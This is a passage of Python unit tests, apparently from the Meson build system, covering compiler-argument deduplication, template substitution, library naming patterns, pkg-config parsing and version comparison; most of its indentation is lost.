return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
    '''A context manager which yields the filename of an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
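# Minimal usage sketch:
#     with temp_filename() as fname:
#         with open(fname, 'w') as f:
#             f.write('temporary contents')
#     # the file is removed again once the with-block exits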
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
    def new_which(cmd, *args):
        if cmd == 'pkg-config':
            return None
        return old_which(cmd, *args)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
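# Minimal usage sketch: any lookup inside the block behaves as if pkg-config
# were not installed at all.
#     with no_pkgconfig():
#         prog = ExternalProgram('pkg-config')
#         assert not prog.found()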
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10'), '2016.10')
self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.x'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class_none_flush(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
a = cc.compiler_args(['-I.'])
        # First check that the tree construction deduplicates the correct -I argument
a += ['-I..']
a += ['-I./tests/']
a += ['-I./tests2/']
        # Think of this as an assertion; we cannot actually run it, otherwise
        # CompilerArgs would already flush the pending changes:
        # assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
a += ['-I.']
a += ['-I.', '-I./tests/']
self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
        # Then check that, when CompilerArgs already holds a built container list, deduplication picks the correct -I argument
a += ['-I.', '-I./tests2/']
self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cc.compiler_args()
self.assertEqual(a, [])
# Test that list initialization works
a = cc.compiler_args(['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
        # -Wl,-ldl is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
        # Cannot be used as a context manager because we need to
        # open it a second time, and that is not possible on
        # Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
dummystate = mock.Mock()
dummystate.subproject = 'dummy'
_mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
_mock.pcdep = mock.Mock()
_mock.pcdep.name = "some_name"
_mock.version_reqs = []
_mock = mock.Mock(held_object=_mock)
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
